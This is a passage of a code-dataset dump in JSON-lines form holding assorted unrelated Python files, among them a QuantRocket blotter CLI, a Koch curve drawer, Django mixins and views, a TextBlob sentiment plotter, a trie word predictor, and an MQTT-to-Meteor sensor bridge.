executions database.\n\nExamples:\n\nGet a CSV of all executions:\n\n quantrocket blotter executions -o executions.csv\n \"\"\"\n parser = _subparsers.add_parser(\n \"executions\",\n help=\"query executions from the executions database\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n filters.add_argument(\n \"-s\", \"--start-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to executions on or after this date\")\n filters.add_argument(\n \"-e\", \"--end-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to executions on or before this date\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_executions\")\n\n examples = \"\"\"\nQuery trading performance and return a PDF tearsheet or CSV of results.\n\nTrading performance is broken down by account and order ref and optionally by\nconid.\n\nExamples:\n\nGet a Moonchart PDF of all trading performance PNL:\n\n quantrocket blotter pnl -o pnl.pdf\n\nGet a PDF for a single account and order ref, broken down by conid:\n\n quantrocket blotter pnl --accounts U12345 --order-refs mystrategy1 --details -o pnl_details.pdf\n\nGet a CSV of performance results for a particular date range:\n\n quantrocket blotter pnl -s 2018-03-01 -e 2018-06-30 --csv -o pnl_2018Q2.csv\n\nCalculate daily performance as of 4PM Eastern time (instead of the default 11:59:59 UTC):\n\n quantrocket blotter pnl --time '16:00:00 America/New_York' -o pnl.pdf\n \"\"\"\n parser = _subparsers.add_parser(\n \"pnl\",\n help=\"query trading performance and return a PDF tearsheet or CSV of results\",\n epilog=examples,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n filters = parser.add_argument_group(\"filtering options\")\n filters.add_argument(\n \"-i\", \"--conids\",\n type=int,\n nargs=\"*\",\n metavar=\"CONID\",\n help=\"limit to these conids\")\n filters.add_argument(\n \"-r\", \"--order-refs\",\n nargs=\"*\",\n metavar=\"ORDER_REF\",\n help=\"limit to these order refs\")\n filters.add_argument(\n \"-a\", \"--accounts\",\n nargs=\"*\",\n metavar=\"ACCOUNT\",\n help=\"limit to these accounts\")\n filters.add_argument(\n \"-s\", \"--start-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to history on or after this date\")\n filters.add_argument(\n \"-e\", \"--end-date\",\n metavar=\"YYYY-MM-DD\",\n help=\"limit to history on or before this date\")\n filters.add_argument(\n \"-t\", \"--time\",\n metavar=\"HH:MM:SS [TZ]\",\n help=\"time of day with optional timezone to calculate daily PNL (default is \"\n \"11:59:59 UTC)\")\n outputs = parser.add_argument_group(\"output options\")\n outputs.add_argument(\n \"-d\", \"--details\",\n action=\"store_true\",\n help=\"return detailed results for all securities instead of aggregating to \"\n \"account/order ref level (only supported for a single account and order ref \"\n \"at a time)\")\n outputs.add_argument(\n \"--csv\",\n 
action=\"store_true\",\n help=\"return a CSV of PNL (default is to return a PDF \"\n \"performance tear sheet)\")\n outputs.add_argument(\n \"-o\", \"--outfile\",\n metavar=\"OUTFILE\",\n dest=\"filepath_or_buffer\",\n help=\"filename to write the data to (default is stdout)\")\n parser.set_defaults(func=\"quantrocket.blotter._cli_download_pnl\")\n\n #parser = _subparsers.add_parser(\"rollover\", help=\"generate orders to rollover futures contracts based on rollover rules\")\n #parser.add_argument(\"-s\", \"--strategies\", nargs=\"*\", metavar=\"CODE\", help=\"limit to these strategies\")\n #parser.add_argument(\"-a\", \"--accounts\", nargs=\"*\", metavar=\"ACCOUNT\", help=\"limit to these accounts\")\n #parser.add_argument(\"-r\", \"--rules\", nargs=\"*\", metavar=\"KEY:VALUE\", help=\"rollover rules as multiple key-value pairs in relativedelta format (e.g. days=-8) (omit to use rollover rules defined in master service)\")\n #parser.set_defaults(func=\"quantrocket.blotter.rollover_positions\")\n\n #parser = _subparsers.add_parser(\"close\", help=\"generate orders to close positions\")\n #parser.add_argument(\"-s\", \"--strategies\", nargs=\"*\", metavar=\"CODE\", help=\"limit to these strategies\")\n #parser.add_argument(\"-c\", \"--conids\", nargs=\"*\", metavar=\"CONID\", help=\"limit to these conids\")\n #parser.add_argument(\"-a\", \"--accounts\", nargs=\"*\", metavar=\"ACCOUNT\", help=\"limit to these accounts\")\n #parser.add_argument(\"-o\", \"--order\", nargs=\"+\", metavar=\"FIELD:VALUE\", help=\"order details as JSON or as multiple key-value pairs (e.g. orderType:MKT tif:DAY)\")\n #parser.add_argument(\"--oca\", dest=\"oca_suffix\", metavar=\"SUFFIX\", help=\"create OCA group containing client ID, order ID, and this suffix (run this command multiple times with this option to create OCA orders)\")\n #parser.set_defaults(func=\"quantrocket.blotter.close_positions\")\n","sub_path":"quantrocket/cli/subcommands/blotter.py","file_name":"blotter.py","file_ext":"py","file_size_in_byte":13083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"340351734","text":"import math\n\nimport MonochromeBitmap\n\nclass Koch:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.point = [(0.0,0.0)]\n\t@classmethod\n\tdef draw(self,level,size):\n\t\tk = Koch()\n\t\tdef drawCurve(level,angle,size):\n\t\t\tif level < 1:\n\t\t\t\tk.x,k.y = k.x + math.cos(angle) * size,k.y + math.sin(angle) * size\n\t\t\t\tk.point.append((k.x,k.y))\n\t\t\t\treturn\n\t\t\ts = size / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle += math.pi / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle -= math.pi * 2 / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\t\tangle += math.pi / 3\n\t\t\tdrawCurve(level - 1,angle,s)\n\t\tdrawCurve(level,0,float(size))\n\t\treturn k.point\n\t@classmethod\n\tdef drawBitmap(self,level,width):\n\t\tpoint = Koch.draw(level,width)\n\t\twidth = int(round(point[-1][0])) + 1\n\t\theight = int(round(point[len(point) / 2][1])) + 1\n\t\tbitmap = MonochromeBitmap.MonochromeBitmap(width,height)\n\t\tfor x,y in point:\n\t\t\tbitmap.set(int(round(x)),int(round(y)))\n\t\treturn bitmap.bitmap()\n","sub_path":"Koch.py","file_name":"Koch.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"273633421","text":"\r\n# 定义一个class类型,然后,每个常量都是class的一个唯一实例。Python提供了Enum类来实现这个功能\r\n\r\nfrom enum import Enum,unique\r\n\r\n# Month = Enum('month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\nMonth = Enum('month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\r\nfor name, member in Month.__members__.items():\r\n print(name, '=>', member, ',', member.value)\r\nprint(Month.Jan)\r\n\r\n\r\nclass Weekday(Enum):\r\n Sun = 0\r\n Mon = 1\r\n Tue = 2\r\n Wed = 3\r\n Thu = 4\r\n Fri = 5\r\n Sat = 6\r\n\r\nprint(Weekday.Sun)\r\nprint(Weekday['Sun'])\r\nprint(Weekday.Sun.value)\r\n\r\n\r\nclass Gender(Enum):\r\n Male = 0\r\n Female = 1\r\n\r\nclass Student(object):\r\n def __init__(self, name, gender):\r\n self.name = name\r\n if isinstance(gender,Gender):\r\n self.gender = gender\r\n else:\r\n raise ValueError('error')\r\n\r\ns = Student('duan',Gender.Male)\r\nprint(s.gender)\r\nprint(s.gender == Gender.Male)","sub_path":"Pscrapy/PycharmProjects/Reptile/枚举类/枚举.py","file_name":"枚举.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"274839878","text":"import json\r\nimport textblob as tb\r\nimport matplotlib.pyplot as plot\r\nimport wordcloud as wc\r\n#pull tweet data out of json file\r\ntweetFile = open('tweets_small.json', 'r')\r\ntweetData = json.load(tweetFile)\r\ntweetFile.close()\r\n#empyt lists\r\npolarity=[]\r\nsubjectivity=[]\r\nsumP=0.0\r\nsumS=0.0\r\n\r\nfor i in tweetData:\r\n tB = tb.TextBlob(i[\"text\"])\r\n #print(tB)#check\r\n #print(tB.polarity)#check\r\n polarity.append(tB.polarity)\r\n sumP+=tB.polarity\r\n subjectivity.append(tB.subjectivity)\r\n sumS+=tB.subjectivity\r\n#print(polarity)\r\n#print(subjectivity)\r\n# print(sumP)\r\n#print(sumS)\r\navgp=sumP/len(polarity)\r\navgs=sumS/len(subjectivity)\r\nprint(\"Polarity average: \", avgp)\r\nprint(\"Subjectivity average: \", avgs)\r\n\r\n#make histogram\r\n#plot.hist(whole data set, bin, color)\r\nplot.hist(polarity, bins = [-1, -.35, .35, 1], color = \"blue\")\r\n#make title\r\nplot.title(\"Polarity Plot\")\r\nplot.xlabel(\"Polarity\")\r\nplot.ylabel(\"Amount\")\r\n#print histogram .show\r\nplot.show()\r\n#subjectivity histogram\r\nplot.hist(subjectivity, bins = [0, .30, .65, 1], color = \"green\")\r\nplot.title(\"Subjectivity Plot\")\r\nplot.xlabel(\"Subjectivity\")\r\nplot.ylabel(\"Amount\")\r\nplot.show()\r\n\r\n#scatter plot: scatter(x, y, s=None, c=None, marker=None, cmap=None, norm=None, vmin=None, vmax=None, alpha=None, linewidths=None, verts=None, edgecolors=None, *, plotnonfinite=False, data=None, **kwargs)\r\nplot.scatter(subjectivity, polarity, color=\"lightpink\")\r\nplot.title(\"Scatter Plot\")\r\nplot.xlabel(\"Subjectivity\")\r\nplot.ylabel(\"Polarity\")\r\nplot.show()\r\n","sub_path":"twittertextblob.py","file_name":"twittertextblob.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"430829543","text":"import trie, sqlite3, gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nclass DataHandler:\n \"\"\"Class to handle data from sqlite database\"\"\"\n def __init__(self):\n \"\"\"Constructor;\n myTrie - Trie to predict words\n myConnection, myCursor - to handle sqlite\n maxnum - index of string\"\"\"\n self.myTrie = trie.Trie()\n '''Connecting to sqlite and creating table'''\n self.myConnection = sqlite3.connect('myDatabase.db')\n self.myCursor = self.myConnection.cursor()\n self.myCursor.execute(\"\"\"create table if not exists myStrings (stringID int primary key not NULL, string text)\"\"\")\n self.myCursor.execute(\"\"\"select * from myStrings\"\"\")\n self.maxnum = -1\n '''Building trie'''\n for row in self.myCursor:\n self.myTrie.addWord(row[1])\n self.maxnum = row[0]\n '''Trie built'''\n self.maxnum += 1\n\n def getPrediction(self, text):\n \"\"\"Returns ListStore containing prediction\"\"\"\n liststore = Gtk.ListStore(str)\n if text == \"\":\n return liststore\n temp2 = text\n text = text.strip().split()\n temp = \"\"\n for i in text[:-1]:\n temp+=i\n temp+=\" \"\n text = text[-1]\n suffix=self.myTrie.predictWord(text)\n if suffix != \"\":\n if temp != \" \":\n liststore.append([temp + text + suffix])\n else:\n liststore.append([text+suffix])\n else:\n predict = \"\"\n tofind = text\n while predict == \"\" and len(tofind) is not 0:\n tofind = tofind[:-1]\n predict=self.myTrie.predictWord(tofind)\n \n if temp != \" \":\n liststore.append([temp + text + \" Did You Mean \" + tofind + predict])\n else:\n liststore.append([text + \" Did You Mean \" + tofind + predict])\n return liststore\n\n def addUnknownWord(self, text):\n \"\"\"Adds unknown text to trie and sqlite\"\"\"\n text = text.split()\n for word in text:\n self.myTrie.addWord(word)\n self.myCursor.execute(\"\"\"insert into myStrings values(?, ?)\"\"\", (self.maxnum, word))\n self.maxnum+=1\n self.myConnection.commit()\n\n def close(self):\n \"\"\"Called when operations are done\"\"\"\n myCursor.close()\n","sub_path":"datahandler.py","file_name":"datahandler.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"15031635","text":"import os\n\nimport build_functions as bf\nfrom config import Config\n\n\ndef start_build():\n config = Config()\n\n while True:\n # 选择游戏\n game = bf.choose_game(config)\n print(game)\n\n # 选择渠道\n channels = bf.choose_channels(config, game)\n\n # 开始批量构建\n for channel in channels:\n bf.build(config, game, channel)\n\n\nstart_build()\n","sub_path":"build_apk.py","file_name":"build_apk.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"526256042","text":"from __future__ import unicode_literals\nimport urlparse\n\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass UrlMixin(models.Model):\n class Meta:\n abstract = True\n\n def get_url(self):\n if hasattr(self.get_url_path, \"dont_recurse\"):\n raise NotImplementedError\n try:\n path = self.get_url_path()\n except NotImplementedError:\n raise\n website_url = getattr(\n settings, \"DEFAULT_WEBSITE_URL\",\n \"http://127.0.0.1:8000\"\n )\n return website_url + path\n\n def get_url_path(self):\n if hasattr(self.get_url, \"dont_recurse\"):\n raise NotImplementedError\n try:\n url = self.get_url()\n except NotImplementedError:\n raise\n bits = urlparse.urlparse(url)\n return urlparse.urlunparse((\"\", \"\") + bits[2:])\n get_url_path.dont_recurse = True\n\n def get_absolute_url(self):\n return self.get_url_path()\n\n\nclass CreationModificationDateMixin(models.Model):\n created = models.DateTimeField(\n _(\"Creation Date and Time\"),\n editable=False,\n auto_now_add=True,\n )\n modified = models.DateTimeField(\n _(\"Modification Date and Time\"),\n null=True,\n editable=False,\n auto_now=True,\n )\n\n def save(self, *args, **kwargs):\n super(CreationModificationDateMixin, self).save(*args, **kwargs)\n save.alters_data = True\n\n class Meta:\n abstract = True\n","sub_path":"ABToast/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"571206857","text":"\"\"\"\nGiven 2 positive integers x and y, compute x/y by just using addition, subtraction and bit shifting\noperations.\n\nQuestion apparently asked to Ravi and Ashwin from IK at Facebook.\nEPI Page 48, 5.6\n\n\"\"\"\n\n\ndef divide(x, y):\n \"\"\"\n Key insight: Find maximum k such that 2**k * y <= x;\n Cache the value of 2**k. For subsequent iterations k will always be lesser.\n quotient += 2**k\n\n Time complexity: If there are n-bits representing x and y, it needs n-iterations with each\n iteration having bit shifting and O(1) time, so total complexity is O(n).\n :param x:\n :param y:\n :return: Quotient from x/y\n \"\"\"\n res = 0\n power = 32\n y_power = y << power\n\n while x >= y:\n while y_power > x:\n power -= 1\n y_power >>= 1\n\n x -= y_power\n res += 1 << power\n return res\n\n\nif __name__ == '__main__':\n print(divide(11, 2)) # 5\n print(divide(49, 7)) # 7\n","sub_path":"app/puzzles_and_math/integer_division.py","file_name":"integer_division.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"129411057","text":"#!/usr/bin/python\nimport yaml\nimport sys\nimport getopt\nimport argparse\n\n\nclass KSKYaml:\n def __init__(self, argv):\n try:\n opts, args = getopt.getopt(argv, \"hd:f:\", [\"data=\", \"file=\"])\n self.opts = opts\n self.args = args\n for opt, arg in opts:\n if opt == '-h':\n self.getHelp()\n elif opt in (\"-f\", \"--file\"):\n self.setFile(arg)\n elif opt in (\"-d\", \"--data\"):\n self.setData(arg)\n if arg != '':\n self.YamlDump(self.getFile(), self.getData())\n except getopt.GetoptError:\n self.getHelp()\n sys.exit(2)\n\n def setFile(self, files):\n self.files = files\n\n def getFile(self):\n return self.files\n\n def setData(self, data):\n self.data = data\n\n def getData(self):\n return self.data\n\n def YamlDump(self, files, data):\n with open(files, 'w') as f:\n yaml.dump(YamlParse(), f, default_flow_style=False, width=2)\n\n def getHelp(self):\n parser = argparse.ArgumentParser(prog='KSKYaml',\n usage='%(prog)s [options]')\n parser.add_argument('--file', nargs='?', help='foo help')\n parser.add_argument('-f', nargs='?', help='foo help')\n parser.add_argument('-d', nargs='?', help='bar help')\n parser.add_argument('--data', nargs='?', help='bar help')\n parser.print_help()\n\nif __name__ == \"__main__\":\n test = KSKYaml(sys.argv[1:])\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"289614428","text":"import torchaudio\nimport random\nimport torch\n\nclass FileLoadingSoxEffects(torch.nn.Module):\n def __init__(self, initial_sample_rate=44100, final_sample_rate=44100, random_pre_resampling=False):\n super().__init__()\n self.random_pre_resampling = random_pre_resampling\n self.effects_before = [\n [\"remix\", \"-\"],\n [\"gain\", \"-n\"],\n ]\n\n self.effects_after = []\n self.sr_change = initial_sample_rate != final_sample_rate\n if self.sr_change or random_pre_resampling:\n self.effects_after.extend([\n [\"rate\", str(final_sample_rate)],\n [\"pad\", \"0\", \"0.3\"]\n ])\n self.initial_sample_rate = initial_sample_rate\n \n\n def forward(self, samples: torch.Tensor):\n effects = [*self.effects_before]\n if random.random() < 0.3:\n if self.random_pre_resampling:\n effects.append([\"rate\", str(random.randint(8000, 16000))])\n effects.extend(self.effects_after)\n elif self.sr_change:\n effects.extend(self.effects_after)\n return torchaudio.sox_effects.apply_effects_tensor(\n samples, self.initial_sample_rate, effects)","sub_path":"src/datasets/diskds/sox_transforms.py","file_name":"sox_transforms.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"233186388","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.forms.formsets import formset_factory\nfrom django.contrib.admin.widgets import AdminDateWidget, \\\n FilteredSelectMultiple\nfrom statistics.models import Action, Dealer\nfrom report.data_collection import PERIOD_TYPE_CHOICE\n\n\nclass KmClientManagerForm(forms.Form):\n \"\"\"Форма фильтрации данных для получения отчета\n\n CLIENT_FILTER_FIELDS - набор полей, которые соответствуют полям из модели\n Client (названия ДОЛЖНЫ СОВПАДАТЬ)\n порядок следования полей формы (login, user_name, computer_name) определяет\n порядок зависимостей при подгрузке чойсов на страницу\n\n \"\"\"\n CLIENT_FILTER_FIELDS = ('login', 'user_name', 'computer_name')\n\n date_from = forms.DateField(label=u'Дата от', widget=AdminDateWidget)\n date_to = forms.DateField(label=u'Дата до', widget=AdminDateWidget)\n period_type = forms.ChoiceField(choices=PERIOD_TYPE_CHOICE,\n label=u'Группировка')\n amount_of_pc = forms.IntegerField(label=u'Доступ с .. и более компьютеров',\n required=False, min_value=0)\n dealer = forms.ModelMultipleChoiceField(\n Dealer.objects.order_by('name'), label=u'Дилер', required=False,\n widget=FilteredSelectMultiple(u'Дилеры', is_stacked=False)\n )\n\n login = forms.MultipleChoiceField(label=u'Логин', required=False)\n user_name = forms.MultipleChoiceField(\n label=u'Имя пользователя', required=False\n )\n computer_name = forms.MultipleChoiceField(\n label=u'Имя компьютера', required=False\n )\n\n def clean_period_type(self):\n return int(self.cleaned_data['period_type'])\n\n def __init__(self, *args, **kwargs):\n # Выборка чойсов для полей в виде словаря ключ - название поля:\n # {'login': [('a','a'),('b','b')] ... }\n filter_choices = kwargs.pop('filter_choices', None)\n\n super(KmClientManagerForm, self).__init__(*args, **kwargs)\n\n # Устанавливаем для дополнительных полей фильтра css классы\n for field_name in self.CLIENT_FILTER_FIELDS:\n self.fields[field_name].widget.attrs['class'] = \\\n 'client_filter_fields'\n\n # Инициализируем чойсы для полей на основе тех данных, что переданы в\n # параметрах\n if filter_choices and isinstance(filter_choices, dict):\n for field_name, choices in filter_choices.iteritems():\n self.fields[field_name].choices = choices\n\n class Media(object):\n js = ('report/js/extended_filtering.js',)\n\n\nclass ActionForm(forms.Form):\n negative = forms.BooleanField(label=u'Не', required=False)\n action = forms.MultipleChoiceField(\n choices=Action.objects.order_by('name').values_list('id', 'name'),\n label=u'Событие',\n required=True,\n )\n UNION_AND = 'and'\n UNION_OR = 'or'\n UNION_CHOICE = (\n (UNION_AND, u'И'),\n (UNION_OR, u'Или')\n )\n union_type = forms.ChoiceField(\n choices=UNION_CHOICE,\n initial='and',\n label=u'Соединение',\n )\n\n class Media(object):\n js = ('report/js/formset.js',)\n\nActionFormset = formset_factory(ActionForm)","sub_path":"modules/report/forms/kmclient_manage.py","file_name":"kmclient_manage.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"301515544","text":"from persona import Persona\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\n\n#SIMULATION PARAMETERS\nn=300 #number of individuals\np_infectadas = 1 #percentage of infected people at the beginning of the simulation (0-100%)\nr_contagio=10 #radius of transmission in pixels (0-100)\np_contagio=100 #probability of transmission in percentage (0-100%)\np_aislamiento =50 #percentage of the people in quarantine (0-100%)\nt_contagiado=100 #time taken to recover in number of frames (0-infinity)\n\n\ncontagiados=0\npersonas=[]\n\n#creating all the individuals in random positions. Infecting some of them\nfor i in range(n):\n p = Persona(i,np.random.random()*100, np.random.random()*100,\n np.random.random() * 100, np.random.random() * 100,\n (np.random.random()+0.5)*100,t_contagiado, False)\n\n if np.random.random()\\d+)/$', views.planDetails, name=\"details\"),\n url(r'^(?P\\d+)/goal/(?P\\d+)/$', views.planForGoal, name=\"planForGoal\"),\n url(r'^(?P\\d+)/role/(?P\\d+)/$', views.planForRole, name=\"planForRole\"),\n)\n","sub_path":"actionplan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"523231042","text":"from django.shortcuts import render, redirect\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import StringTextForm, UploadFileForm, RegistrationForm, AddDeleteForm\nfrom .textChecker import CheckedText, gives_file_text, creates_words_list\nfrom .models import PersonalData\n\n\ndef choice(request):\n \"\"\"\n Displays main page with choices of login/registration and choices\n how to provide data to the program.\n \"\"\"\n return render(request, 'textChecker/index.html')\n\n\ndef file_input(request):\n \"\"\"Displays page with form to upload a file in txt/docx/pdf format.\"\"\"\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n result = gives_file_text(request.FILES['file'])\n if result == 'Wrong file format!':\n form = UploadFileForm()\n return render(request,\n 'textChecker/input.html',\n {'form': form,\n 'error': 'Zły format pliku, spróbuj ponownie'})\n if not request.user.is_anonymous():\n user_wrong_words = request.user.personaldata.wrong_words\n finalResult = CheckedText(result, user_wrong_words)\n else:\n finalResult = CheckedText(result)\n return render(request, 'textChecker/text_output.html',\n {'result': finalResult})\n\n form = UploadFileForm()\n return render(request, 'textChecker/input.html', {'form': form})\n\n\ndef text_input(request):\n \"\"\"Displays page with form to upload a text.\"\"\"\n if request.method == \"POST\":\n form = StringTextForm(request.POST)\n if form.is_valid():\n stringText = request.POST['text']\n if not request.user.is_anonymous():\n user_wrong_words = request.user.personaldata.wrong_words\n result = CheckedText(stringText, user_wrong_words)\n else:\n result = CheckedText(stringText)\n return render(request, 'textChecker/text_output.html',\n {'result': result})\n\n form = StringTextForm()\n return render(request, 'textChecker/input.html', {'form': form})\n\n\n@login_required\ndef wrong_words(request):\n \"\"\"\n Displays incorrect elements to search and enables user to\n add or remove elements from his own personal list.\n \"\"\"\n if request.method == \"POST\":\n form = AddDeleteForm(request.POST)\n if form.is_valid():\n choice = request.POST['select']\n word = request.POST['word']\n obj = PersonalData.objects.get(user=request.user)\n if choice == 'Add':\n obj.wrong_words += '\\n' + word.strip()\n elif choice == 'Delete':\n if word in obj.wrong_words:\n obj.wrong_words = obj.wrong_words.replace('\\n' + word, '')\n obj.save()\n result = request.user.personaldata.wrong_words\n return render(request, 'textChecker/wrong_words_changed.html',\n {'result': result})\n\n user_wrong_words = request.user.personaldata.wrong_words\n # Using external function from textChecker module.\n wrongWordsList = creates_words_list('incorrectWords.txt')\n form = AddDeleteForm()\n return render(request, 'textChecker/wrong_words.html',\n {'user_wrong_words': user_wrong_words,\n 'wrong_words': wrongWordsList,\n 'form': form})\n\n\ndef register_page(request):\n \"\"\"Page for new user registration.\"\"\"\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n User.objects.create_user(username=form.cleaned_data['username'],\n password=form.cleaned_data['password1'],\n email=form.cleaned_data['email'])\n return render(request, 'registration/register_success.html',\n {'user': form.cleaned_data['username']})\n else:\n return render(request, 'registration/register.html', {'form': 
form})\n\n form = RegistrationForm()\n return render(request, 'registration/register.html', {'form': form})\n\n","sub_path":"textChecker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"171042346","text":"import random\nclass Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n p1, p2 = 0, 0\n while p2 < len(nums2):\n while p1 < len(nums1) and nums1[p1] < nums2[p2]:\n p1 += 1\n if p1 == len(nums1):\n nums1 = nums1 + [nums2[p2]]\n else:\n nums1 = nums1[:p1] + [nums2[p2]] + nums1[p1:]\n p2 += 1\n # print(nums1)\n\n if len(nums1) % 2 == 0:\n return (nums1[int(len(nums1) / 2) - 1] + nums1[int(len(nums1) / 2)]) / 2\n else:\n return nums1[int(len(nums1) / 2)]\n\nif __name__ == '__main__':\n sol = Solution()\n nums1 = [1, 3]\n nums2 = [2, 3]\n nums1 = sorted([random.randint(int(10e5)*-1, int(10e5)) for _ in range(1000)])\n nums2 = sorted([random.randint(int(10e5)*-1, int(10e5)) for _ in range(1000)])\n \n print(nums1)\n\n print(nums2)\n\n print(sol.findMedianSortedArrays(nums1, nums2))\n","sub_path":"source code/4. Median of Two Sorted Arrays.py","file_name":"4. Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"603869882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url \nfrom blog import views\n\nurlpatterns = patterns('',\n url(r'^$', views.home, name ='home'),\n # url(r'^register/$', views.register, name ='register'),\n # url(r'^login/$', views.user_login, name='login'),\n # url(r'^logout/$', views.user_logout, name='logout'),\n url(r'^post/(?P[0-9]+)/$', views.post_detail, name ='post_detail'),\n\t url(r'^post/new/$', views.post_new, name='post_new'),\n\t url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name ='post_edit'),\n\t url(r'^post/(?P[0-9]+)/delete/$', views.post_delete, name ='post_delete'),\n\t url(r'^post/(?P[0-9]+)/comment/$', views.add_comment_to_post, name ='add_comment_to_post'),\n\t url(r'^post/(?P[0-9]+)/publish/$', views.post_publish, name ='post_publish'),\n\t url(r'^comment/(?P[0-9]+)/remove/$', views.comment_remove, name ='comment_remove'),\n\t url(r'^comment/(?P[0-9]+)/approve/$', views.comment_approve, name ='comment_approve'),\n\t \n )","sub_path":"django_blog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"265854513","text":"from time import strftime # Aikaleimakirjasto\n\nfrom MeteorClient import MeteorClient\n\nmeteor = MeteorClient('ws://127.0.0.1:3000/websocket')\nmeteor.connect()\n\nimport paho.mqtt.client as mqtt\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n #print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe(\"sensors/#\")\n\n# The callback for when a PUBLISH message is received from the server.\n\ndef insert_callback(error, data):\n if error:\n print(error)\n return\n print(data)\n\ndef on_message(client, userdata, msg):\n\n if ( msg.topic == \"/sensors/sade\" ):\n print(\"sade \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('sade', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/tsuun\" ):\n print(\"tuulensuunta \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('tuulensuunta', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/tnop\" ):\n print(\"tuulennopeus \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('tuulennopeus', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/lampo\" ):\n print(\"lampotila \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('lampotila', {'title': msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\n if ( msg.topic == \"/sensors/ikosteus\" ):\n print(\"ilmankosteus \" + msg.payload.decode(\"utf-8\"))\n meteor.insert('ilmankosteus',\n {'title': 